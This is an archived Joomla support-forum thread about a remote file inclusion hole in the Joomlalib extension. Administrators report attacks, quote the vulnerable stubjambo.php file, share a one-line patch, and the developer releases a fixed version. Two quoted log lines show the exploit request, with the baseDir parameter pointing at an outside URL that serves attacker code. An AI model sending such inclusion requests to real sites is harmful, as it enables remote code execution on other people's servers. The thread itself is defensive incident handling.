Remote File Inclusion: Joomlalib - All versions
Moderator: General Support Moderators
Forum rules
-
- Joomla! Apprentice
- Posts: 16
- Joined: Mon Jun 05, 2006 2:04 pm
Remote File Inclusion: Joomlalib - All versions
Hi,
my provider has sand me an email with the message there was a hack attempt on the server true my site.
according to the log 'the hacker' included an external URL in stubjambo.php.
What can i do about this?
is use joomla 1.0.13
latest php and mysql
my provider has sand me an email with the message there was a hack attempt on the server true my site.
according to the log 'the hacker' included an external URL in stubjambo.php.
What can i do about this?
is use joomla 1.0.13
latest php and mysql
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: hacking attempt com_joomlalib
Hack attempt does not mean the crack has been done.
Please ask your provider to quote the log concerning this.
Also, which version of Joomlalib and/or bsq_sitestats are you using?
Please ask your provider to quote the log concerning this.
Also, which version of Joomlalib and/or bsq_sitestats are you using?
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
-
- Joomla! Apprentice
- Posts: 16
- Joined: Mon Jun 05, 2006 2:04 pm
Re: hacking attempt com_joomlalib
log:
i have no idea what version of Joomlalib or bsq_sitestats, the one that comes with Joomla 1.0.12scoutingranst.be 211.175.61.131 - - [18/Sep/2007:01:09:27 +0200] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.freewe
btown.com/v3nom/id.txt? HTTP/1.1" 200 52 "-" "libwww-perl/5.79"
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: hacking attempt com_joomlalib
They do not come with Joomla. These are 3rd party extensions.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
-
- Joomla! Apprentice
- Posts: 16
- Joined: Mon Jun 05, 2006 2:04 pm
Re: hacking attempt com_joomlalib
ah, but i still have no idea. Any idea where i can find this?
- RussW
- Joomla! Exemplar
- Posts: 9347
- Joined: Sun Oct 22, 2006 4:42 am
- Location: Sunshine Coast, Queensland, Australia
- Contact:
Re: hacking attempt com_joomlalib
Please log in to your Joomla! Administrator site, list the components and there you will see the versions of the installed items and their appropriate authoers websites. Check on the authors websites for updates and/or known exploits, also check their forums for similar problems, these are not core Joomla! extensions.
Joomla! on the fabulous Sunshine Coast...
hotmango, web & print http://www.hotmango.me/
The Styleguyz https://www.thestyleguyz.com/
hotmango, web & print http://www.hotmango.me/
The Styleguyz https://www.thestyleguyz.com/
-
- Joomla! Fledgling
- Posts: 4
- Joined: Fri Oct 06, 2006 12:10 am
Remote File Inclusion: Joomlalib - All versions
Affected component:
Joomlalib (necessary for the Gallery2 component)
The log file:
x - - [19/Sep/2007:00:21:00 +0200] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://xxxx/tmp/echo3? HTTP/1.1" 200 924 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
File contains:
What do you guys suggest as fix?
Joomlalib (necessary for the Gallery2 component)
The log file:
x - - [19/Sep/2007:00:21:00 +0200] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://xxxx/tmp/echo3? HTTP/1.1" 200 924 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
File contains:
Code: Select all
<?
/** Create a Joomla/Mambo environment for our example programs
* @package examples
*/
$baseDir = dirname(__FILE__) . '/';
/** */
define('_VALID_MOS', 1); //Pretend we're Joomla
require_once($baseDir.'../../../globals.php');
require_once($baseDir.'../../../configuration.php');
require_once($baseDir .'../../../includes/mambo.php');
$database = new database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix );
$GLOBALS['database'] = $database;
?>
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: hacking attempt com_joomlalib
Merging with similar thread.
Looks like joomlalib is indeed at stake.
Looks like joomlalib is indeed at stake.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
- 55thinking
- Joomla! Enthusiast
- Posts: 183
- Joined: Mon Sep 05, 2005 8:58 am
- Location: Madrid
- Contact:
Re: Remote File Inclusion: Joomlalib - All versions
is there a fix available ?
We affected...and we are not using the mentionned component, it got injected in our install
We affected...and we are not using the mentionned component, it got injected in our install
55 Thinking - Strategy Design Technology
Good looking, Fast and Usable web solutions
http://www.55thinking.com/
Good looking, Fast and Usable web solutions
http://www.55thinking.com/
-
- Joomla! Fledgling
- Posts: 1
- Joined: Thu Sep 20, 2007 10:36 am
Re: Remote File Inclusion: Joomlalib - All versions
Hi,
This is actively being exploited. I don't think the affected file
is normally used if at all - others may be able to confirm...
Unfortunately the exploited $baseDir affects Joomla further
along the processing so fixing in this file not seem to help.
If $baseDir is set in request, then abort going no further.
This may break your sites - works fine for me.
Cheers,
This is actively being exploited. I don't think the affected file
is normally used if at all - others may be able to confirm...
Unfortunately the exploited $baseDir affects Joomla further
along the processing so fixing in this file not seem to help.
If $baseDir is set in request, then abort going no further.
This may break your sites - works fine for me.
Code: Select all
if(isset($_REQUEST['baseDir'])) { return FALSE;}
Code: Select all
<?
/** Create a Joomla/Mambo environment for our example programs
* @package examples
*/}
if(isset($_REQUEST['baseDir'])) { return FALSE;}
$baseDir = dirname(__FILE__) . '/';
/** */
define('_VALID_MOS', 1); //Pretend we're Joomla
require_once($baseDir.'../../../globals.php');
require_once($baseDir.'../../../configuration.php');
require_once($baseDir .'../../../includes/mambo.php');
$database = new database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix );
$GLOBALS['database'] = $database;
?>
-
- Joomla! Fledgling
- Posts: 4
- Joined: Fri Oct 06, 2006 12:10 am
Re: Remote File Inclusion: Joomlalib - All versions
Fix works here without complications. Thanks for your quick response.amacide wrote: Hi,
This is actively being exploited. I don't think the affected file
is normally used if at all - others may be able to confirm...
Unfortunately the exploited $baseDir affects Joomla further
along the processing so fixing in this file not seem to help.
If $baseDir is set in request, then abort going no further.
This may break your sites - works fine for me.
Cheers,Code: Select all
if(isset($_REQUEST['baseDir'])) { return FALSE;}
Code: Select all
<? /** Create a Joomla/Mambo environment for our example programs * @package examples */} if(isset($_REQUEST['baseDir'])) { return FALSE;} $baseDir = dirname(__FILE__) . '/'; /** */ define('_VALID_MOS', 1); //Pretend we're Joomla require_once($baseDir.'../../../globals.php'); require_once($baseDir.'../../../configuration.php'); require_once($baseDir .'../../../includes/mambo.php'); $database = new database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix ); $GLOBALS['database'] = $database; ?>
-
- Joomla! Apprentice
- Posts: 27
- Joined: Sun Oct 30, 2005 1:39 am
- Location: Denmark
- Contact:
Re: Remote File Inclusion: Joomlalib - All versions
This is certainly at risk! If the injected php code is to be believed, the attack goes way beyond the individual site being hacked for phishing purposes and right into the host's system accounts.
I've sent a copy of the injected code to infograf678 - I hope he will comment on the code here, if he gets the time...
/hamsel
I've sent a copy of the injected code to infograf678 - I hope he will comment on the code here, if he gets the time...
/hamsel
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Remote File Inclusion: Joomlalib - All versions
Sending mails around...
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
- trompete
- Joomla! Explorer
- Posts: 273
- Joined: Thu Sep 01, 2005 11:19 pm
- Location: Minneapolis, USA
- Contact:
Re: Remote File Inclusion: Joomlalib - All versions
Hi,
Infograf was nice enough to make me aware of this vulnerability. I don't think this file is being used either. I'll do a code review since it's been 9 months since I looked at it (life > internet). I'll release a new package with this file removed as soon as I can.
Brent
Infograf was nice enough to make me aware of this vulnerability. I don't think this file is being used either. I'll do a code review since it's been 9 months since I looked at it (life > internet). I'll release a new package with this file removed as soon as I can.
Brent
Developer, bsq_sitestats module.
www.bs-squared.com
www.bs-squared.com
- trompete
- Joomla! Explorer
- Posts: 273
- Joined: Thu Sep 01, 2005 11:19 pm
- Location: Minneapolis, USA
- Contact:
Re: Remote File Inclusion: Joomlalib - All versions
Where did JoomlaLib and BSQ go on the extensions site? That wasn't very nice.
Developer, bsq_sitestats module.
www.bs-squared.com
www.bs-squared.com
- trompete
- Joomla! Explorer
- Posts: 273
- Joined: Thu Sep 01, 2005 11:19 pm
- Location: Minneapolis, USA
- Contact:
Re: Remote File Inclusion: Joomlalib - All versions
I posted a new version here:
http://joomlacode.org/gf/project/joomlalib/frs/
I still can't find the extension site entries to update them, but here's the fixed version.
http://joomlacode.org/gf/project/joomlalib/frs/
I still can't find the extension site entries to update them, but here's the fixed version.
Developer, bsq_sitestats module.
www.bs-squared.com
www.bs-squared.com
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Remote File Inclusion: Joomlalib - All versions
Brent,
Thanks for your fast reply.
JED admins took it off until fix made. Usual policy. We were very much worrying this morning about these reports
BSQ sitestats is concerned but also the Gallery2 extension I guess.
Please let ot2sen (Ole) know when you have uploaded new versions on joomlacode for the components too.
JM
Thanks for your fast reply.
JED admins took it off until fix made. Usual policy. We were very much worrying this morning about these reports
BSQ sitestats is concerned but also the Gallery2 extension I guess.
Please let ot2sen (Ole) know when you have uploaded new versions on joomlacode for the components too.
JM
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
- ot2sen
- Joomla! Master
- Posts: 10381
- Joined: Thu Aug 18, 2005 9:58 am
- Location: Hillerød - Denmark
- Contact:
Re: Remote File Inclusion: Joomlalib - All versions
BSQ and Gallery2Bridge published again. Feel welcomed to update descriptions and version info. Thankstrompete wrote: I posted a new version here:
http://joomlacode.org/gf/project/joomlalib/frs/
I still can't find the extension site entries to update them, but here's the fixed version.
Ole Bang Ottosen
Dansk frivillig Joomla! support websted - joomla.dk
OpenTranslators Core Team opentranslators.org
Dansk frivillig Joomla! support websted - joomla.dk
OpenTranslators Core Team opentranslators.org
-
- Joomla! Apprentice
- Posts: 5
- Joined: Sun Dec 04, 2005 2:48 am
Site hacked through joomlalib
I have posted the problem in the dev forum of joomlalib, so I will just post here the link the their forum.
http://forum.4theweb.nl/showthread.php?p=5020#post5020
From my point of view, the newest joomlalib is also affected!
http://forum.4theweb.nl/showthread.php?p=5020#post5020
From my point of view, the newest joomlalib is also affected!
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Site hacked through joomlalib
Moving to the related thread.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Remote File Inclusion: Joomlalib - All versions
@trompete
Can you look into that?
Can you look into that?
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
- trompete
- Joomla! Explorer
- Posts: 273
- Joined: Thu Sep 01, 2005 11:19 pm
- Location: Minneapolis, USA
- Contact:
Re: Remote File Inclusion: Joomlalib - All versions
Later. It's office hours here in the USA. I should be able to look at 8 PM CST (GMT - 6)
Developer, bsq_sitestats module.
www.bs-squared.com
www.bs-squared.com
- Michiel_1981
- Joomla! Intern
- Posts: 71
- Joined: Sun Aug 28, 2005 6:38 am
- Contact:
Re: Remote File Inclusion: Joomlalib - All versions
Just looked into this with trompete, and there is NO know include like this in the code anymore, we emptied the file completly in the latest release.infograf768 wrote: @trompete
Can you look into that?
so post complete file content and file name! So we can look into this.
kind regards,
Michiel
EDIT: forgot 1 word
Last edited by Michiel_1981 on Tue Oct 09, 2007 2:28 pm, edited 1 time in total.
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Remote File Inclusion: Joomlalib - All versions
Thanks folks.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
-
- Joomla! Apprentice
- Posts: 5
- Joined: Sun Dec 04, 2005 2:48 am
Re: Remote File Inclusion: Joomlalib - All versions
thanks. didn't see this topic. and the latest link I found on 4theweb.nl was going to a 1.3.1 version which still had the problem.
-
- Joomla! Apprentice
- Posts: 24
- Joined: Thu Feb 19, 2009 2:23 pm
Re: Remote File Inclusion: Joomlalib - All versions
Just looked at my error logs and this exploit is still being tried. Found the source from 4 origins, just in one day:
[RussW IP Addresses Removed, pointless exercise, these could be other compromised sites, via proxies or hijaked, the IP Address potentially mean nothing and do not assist with issue diagnosis or resolution ]
Put these in http://ip-address-lookup-v4.com/ to see their origins!!!!!!!!!!
I am running 1.0.15, and this directory/file does not reside on my website.
[RussW IP Addresses Removed, pointless exercise, these could be other compromised sites, via proxies or hijaked, the IP Address potentially mean nothing and do not assist with issue diagnosis or resolution ]
Put these in http://ip-address-lookup-v4.com/ to see their origins!!!!!!!!!!
I am running 1.0.15, and this directory/file does not reside on my website.
-
- Joomla! Apprentice
- Posts: 16
- Joined: Sat Apr 24, 2010 5:21 am
- Contact:
Re: Remote File Inclusion: Joomlalib - All versions
Thank you very much for information.trompete wrote:I posted a new version here:
http://joomlacode.org/gf/project/joomlalib/frs/
I still can't find the extension site entries to update them, but here's the fixed version.
C R Wills
Law Directory - http://www.attorneylawyerdirectory.org
Constuction Directory - http://constructiontoday.org
Law Directory - http://www.attorneylawyerdirectory.org
Constuction Directory - http://constructiontoday.org